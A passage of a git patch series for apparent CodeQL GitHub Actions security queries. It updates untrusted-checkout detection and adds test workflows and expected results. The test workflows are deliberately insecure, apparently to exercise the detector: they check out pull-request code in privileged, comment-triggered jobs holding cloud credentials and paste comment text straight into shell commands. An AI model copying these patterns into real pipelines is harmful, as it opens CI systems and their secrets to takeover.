| + source .github/workflows/scripts/ci_helpers.sh + + RET=0 + for commit in $(git rev-list HEAD ^origin/$BRANCH); do + info "=== Checking commit '$commit'" + if git show --format='%P' -s $commit | grep -qF ' '; then + err "Pull request should not include merge commits" + RET=1 + fi + + author="$(git show -s --format=%aN $commit)" + if echo $author | grep -q '\S\+\s\+\S\+'; then + success "Author name ($author) seems ok" + else + err "Author name ($author) need to be your real name 'firstname lastname'" + RET=1 + fi + + subject="$(git show -s --format=%s $commit)" + if echo "$subject" | grep -q -e '^[0-9A-Za-z,+/_\.-]\+: ' -e '^Revert '; then + success "Commit subject line seems ok ($subject)" + else + err "Commit subject line MUST start with ': ' ($subject)" + RET=1 + fi + + body="$(git show -s --format=%b $commit)" + sob="$(git show -s --format='Signed-off-by: %aN <%aE>' $commit)" + if echo "$body" | grep -qF "$sob"; then + success "Signed-off-by match author" + else + err "Signed-off-by is missing or doesn't match author (should be '$sob')" + RET=1 + fi + + if echo "$body" | grep -v "Signed-off-by:"; then + success "A commit message exists" + else + err "Missing commit message. Please describe your changes" + RET=1 + fi + done + + exit $RET diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml new file mode 100644 index 000000000000..c91b68f6b875 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml @@ -0,0 +1,12 @@ +name: Test Formalities + +on: + pull_request: + +permissions: + contents: read + +jobs: + build: + name: Test Formalities + uses: TestOrg/TestRepo/.github/workflows/formal.yml@main diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3db6902ad2f6..d9cbfe804ae8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,8 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9f3e500817a4..eb9fcc2418ab 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,4 @@ +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 269c1de902b0028873fbb813a90150fc06b9956d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:22:18 +0200 Subject: [PATCH 521/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ec2e82dfe010..b4c388cf6152 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.49 +version: 0.1.50 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 70f493e1d64b..e5709a523298 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.49 +version: 0.1.50 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53f82d3d6c54a49dbba84e3e47782c6a7a2d54f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:29:35 +0200 Subject: [PATCH 522/707] Control Checks in Run/Uses steps also protect Jobs that depend on them --- .../codeql/actions/security/ControlChecks.qll | 14 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 30 +- .../CWE-829/.github/workflows/test14.yml | 227 +++++++++++++++ .../CWE-829/.github/workflows/test15.yml | 271 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 37 +++ 6 files changed, 571 insertions(+), 16 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 26bee3ca3a68..1a47f4d92d02 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -59,7 +59,15 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(Step).getAFollowingStep() = step + ( + this instanceof Run or + this instanceof UsesStep + ) and + ( + this.(Step).getAFollowingStep() = step + or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + ) } abstract predicate protectsCategoryAndEvent(string category, string event); @@ -188,9 +196,7 @@ class AssociationIfCheck extends AssociationCheck instanceof If { ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", - ]) and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") + ]) } } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 499abc047b65..9efd9b036cd1 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -29,8 +29,14 @@ where ( // issue_comment: check for date comparison checks and actor/access control checks exists(Event event | - event.getName() = "issue_comment" and event = checkout.getEnclosingJob().getATriggerEvent() and + ( + event.getName() = "issue_comment" + or + event.getName() = "workflow_call" and + checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = + "issue_comment" + ) and not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( check instanceof ActorCheck or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 8577218800e1..ce138fb04786 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -26,23 +26,31 @@ where inPrivilegedContext(checkout) and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event e | - e.getName() = "issue_comment" and - checkout.getEnclosingJob().getATriggerEvent() = e and - not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check | - (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and - write_check.dominates(checkout) and - data_check.dominates(checkout) + exists(Event event | + event = checkout.getEnclosingJob().getATriggerEvent() and + ( + event.getName() = "issue_comment" + or + event.getName() = "workflow_call" and + checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = + "issue_comment" + ) and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | + ( + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck + ) and + check.dominates(checkout) and + date_check.dominates(checkout) ) ) or // not issue_comment triggered workflows exists(Event event | not event.getName() = "issue_comment" and - not exists(ControlCheck check | - check - .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout") - ) + event = checkout.getEnclosingJob().getATriggerEvent() and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) ) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml new file mode 100644 index 000000000000..6f03a0e966a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml @@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d9cbfe804ae8..4fbfca241261 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -188,6 +188,43 @@ edges | .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | | .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | | .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | +| .github/workflows/test14.yml:38:7:41:4 | Uses Step | .github/workflows/test14.yml:41:7:44:4 | Run Step | +| .github/workflows/test14.yml:41:7:44:4 | Run Step | .github/workflows/test14.yml:44:7:58:4 | Run Step | +| .github/workflows/test14.yml:44:7:58:4 | Run Step | .github/workflows/test14.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test14.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test14.yml:94:7:101:4 | Uses Step | +| .github/workflows/test14.yml:94:7:101:4 | Uses Step | .github/workflows/test14.yml:101:7:105:4 | Uses Step | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | .github/workflows/test14.yml:105:7:111:4 | Uses Step | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | .github/workflows/test14.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test14.yml:135:7:141:4 | Run Step: email | .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test14.yml:169:7:174:4 | Uses Step | +| .github/workflows/test14.yml:169:7:174:4 | Uses Step | .github/workflows/test14.yml:174:7:187:4 | Run Step | +| .github/workflows/test14.yml:174:7:187:4 | Run Step | .github/workflows/test14.yml:187:7:198:4 | Run Step | +| .github/workflows/test14.yml:187:7:198:4 | Run Step | .github/workflows/test14.yml:198:7:206:4 | Uses Step | +| .github/workflows/test14.yml:198:7:206:4 | Uses Step | .github/workflows/test14.yml:206:7:226:4 | Uses Step | +| .github/workflows/test14.yml:206:7:226:4 | Uses Step | .github/workflows/test14.yml:226:7:227:45 | Run Step | +| .github/workflows/test15.yml:38:7:56:4 | Run Step: environment | .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test15.yml:60:7:65:4 | Uses Step | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | .github/workflows/test15.yml:65:7:68:4 | Uses Step | +| .github/workflows/test15.yml:65:7:68:4 | Uses Step | .github/workflows/test15.yml:68:7:83:2 | Run Step | +| .github/workflows/test15.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test15.yml:110:7:115:4 | Uses Step | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | .github/workflows/test15.yml:115:7:120:4 | Uses Step | +| .github/workflows/test15.yml:115:7:120:4 | Uses Step | .github/workflows/test15.yml:120:7:127:4 | Run Step | +| .github/workflows/test15.yml:120:7:127:4 | Run Step | .github/workflows/test15.yml:127:7:131:4 | Run Step | +| .github/workflows/test15.yml:127:7:131:4 | Run Step | .github/workflows/test15.yml:131:7:136:4 | Run Step | +| .github/workflows/test15.yml:131:7:136:4 | Run Step | .github/workflows/test15.yml:136:7:141:2 | Run Step | +| .github/workflows/test15.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test15.yml:173:7:180:4 | Uses Step | +| .github/workflows/test15.yml:173:7:180:4 | Uses Step | .github/workflows/test15.yml:180:7:185:4 | Uses Step | +| .github/workflows/test15.yml:180:7:185:4 | Uses Step | .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test15.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test15.yml:197:7:203:4 | Run Step: email | .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test15.yml:231:7:236:4 | Uses Step | +| .github/workflows/test15.yml:231:7:236:4 | Uses Step | .github/workflows/test15.yml:236:7:242:4 | Run Step | +| .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | +| .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | +| .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From 610dcaf23dfe2915c6451dc565ddb5f16254e247 Mon Sep 17 00:00:00 2001 From: 